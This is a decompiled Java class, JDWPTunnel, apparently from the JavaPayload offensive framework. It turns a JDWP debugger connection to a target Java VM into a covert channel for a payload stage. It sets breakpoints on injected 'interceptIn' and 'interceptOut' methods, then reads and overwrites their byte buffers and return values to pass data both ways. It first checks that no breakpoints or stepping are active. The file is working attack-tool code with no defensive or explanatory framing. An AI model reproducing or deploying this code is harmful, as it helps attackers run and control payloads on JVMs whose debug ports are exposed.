/*
 * Decompiled with CFR 0.152.
 */
package javapayload.handler.stager;

import com.sun.jdi.ArrayReference;
import com.sun.jdi.ByteValue;
import com.sun.jdi.ClassType;
import com.sun.jdi.LocalVariable;
import com.sun.jdi.Location;
import com.sun.jdi.ThreadReference;
import com.sun.jdi.Value;
import com.sun.jdi.VirtualMachine;
import com.sun.jdi.event.BreakpointEvent;
import com.sun.jdi.event.Event;
import com.sun.jdi.event.EventIterator;
import com.sun.jdi.event.EventQueue;
import com.sun.jdi.event.EventSet;
import com.sun.jdi.request.BreakpointRequest;
import java.io.PipedInputStream;
import java.io.PipedOutputStream;
import java.io.PrintStream;
import java.util.Arrays;
import java.util.List;
import javapayload.handler.stage.StageHandler;
import javapayload.handler.stager.StagerHandler;
import javapayload.handler.stager.WrappedPipedOutputStream;

public class JDWPTunnel
extends StagerHandler
implements Runnable {
    private ClassType communicationClass;
    private WrappedPipedOutputStream pipedOut;
    private PipedInputStream pipedIn;
    private PrintStream errorStream;

    protected void handle(StageHandler stageHandler, String[] parameters, PrintStream errorStream, Object extraArg) throws Exception {
        this.errorStream = errorStream;
        if (extraArg == null || !(extraArg instanceof ClassType)) {
            throw new IllegalArgumentException("No JDWP communication class found");
        }
        this.communicationClass = (ClassType)extraArg;
        VirtualMachine vm = this.communicationClass.virtualMachine();
        if (vm.eventRequestManager().stepRequests().size() > 0) {
            throw new RuntimeException("Some threads are currently stepping");
        }
        if (vm.eventRequestManager().breakpointRequests().size() > 0) {
            throw new RuntimeException("There are some breakpoints set");
        }
        PipedOutputStream pos = new PipedOutputStream();
        this.pipedOut = new WrappedPipedOutputStream(pos);
        this.pipedIn = new PipedInputStream();
        new Thread(this).start();
        stageHandler.handle(new WrappedPipedOutputStream(new PipedOutputStream(this.pipedIn)), new PipedInputStream(pos), parameters);
    }

    public void run() {
        VirtualMachine vm = this.communicationClass.virtualMachine();
        try {
            Location interceptIn = this.communicationClass.methodsByName("interceptIn").get(0).locationOfCodeIndex(2L);
            Location interceptOut = this.communicationClass.methodsByName("interceptOut").get(0).locationOfCodeIndex(2L);
            BreakpointRequest req = vm.eventRequestManager().createBreakpointRequest(interceptIn);
            req.setSuspendPolicy(1);
            req.setEnabled(true);
            req = vm.eventRequestManager().createBreakpointRequest(interceptOut);
            req.setSuspendPolicy(1);
            req.setEnabled(true);
            EventQueue q = vm.eventQueue();
            boolean done = false;
            this.errorStream.println("== Handling I/O events...");
            block2: while (true) {
                EventSet es;
                if (!done) {
                    es = q.remove();
                } else {
                    es = q.remove(1000L);
                    if (es == null) break;
                }
                EventIterator ei = es.eventIterator();
                while (true) {
                    if (!ei.hasNext()) continue block2;
                    Event e = ei.nextEvent();
                    if (!done && e instanceof BreakpointEvent) {
                        ArrayReference buf;
                        LocalVariable result;
                        BreakpointEvent be = (BreakpointEvent)e;
                        Location loc = be.location();
                        ThreadReference tr = be.thread();
                        if (((Object)loc).equals(interceptIn)) {
                            result = loc.method().variablesByName("result").get(0);
                            LocalVariable buffer = loc.method().arguments().get(0);
                            buf = (ArrayReference)tr.frame(0).getValue(buffer);
                            new InputInterceptHandler(tr, buf, result).start();
                            continue;
                        }
                        if (((Object)loc).equals(interceptOut)) {
                            result = loc.method().variablesByName("result").get(0);
                            LocalVariable data = loc.method().arguments().get(0);
                            buf = (ArrayReference)tr.frame(0).getValue(data);
                            List<Value> values = buf.getValues();
                            byte[] temp = new byte[buf.length()];
                            for (int i = 0; i < temp.length; ++i) {
                                temp[i] = ((ByteValue)values.get(i)).byteValue();
                            }
                            this.pipedOut.write(temp);
                            this.pipedOut.flush();
                            if (temp.length == 0) {
                                this.pipedOut.close();
                                this.pipedIn.close();
                                done = true;
                            }
                            tr.frame(0).setValue(result, vm.mirrorOf(true));
                            tr.resume();
                            continue;
                        }
                        throw new RuntimeException("Unknown location: " + loc);
                    }
                    System.out.println("== Unknown event received: " + e.toString());
                    es.resume();
                }
                break;
            }
        }
        catch (Throwable t) {
            t.printStackTrace(this.errorStream);
        }
        vm.dispose();
    }

    protected boolean needHandleBeforeStart() {
        return false;
    }

    public class InputInterceptHandler
    extends Thread {
        private final ThreadReference thread;
        private final ArrayReference buffer;
        private final LocalVariable result;

        public InputInterceptHandler(ThreadReference thread, ArrayReference buffer, LocalVariable result) {
            this.thread = thread;
            this.buffer = buffer;
            this.result = result;
            this.setDaemon(true);
        }

        public void run() {
            try {
                byte[] temp = new byte[this.buffer.length()];
                int len = JDWPTunnel.this.pipedIn.read(temp);
                if (len > 0) {
                    ByteValue[] bytes = new ByteValue[len];
                    for (int i = 0; i < bytes.length; ++i) {
                        bytes[i] = this.thread.virtualMachine().mirrorOf(temp[i]);
                    }
                    this.buffer.setValues(0, Arrays.asList(bytes), 0, len);
                }
                this.thread.frame(0).setValue(this.result, this.thread.virtualMachine().mirrorOf(len));
                this.thread.resume();
            }
            catch (Throwable t) {
                t.printStackTrace(JDWPTunnel.this.errorStream);
            }
        }
    }
}

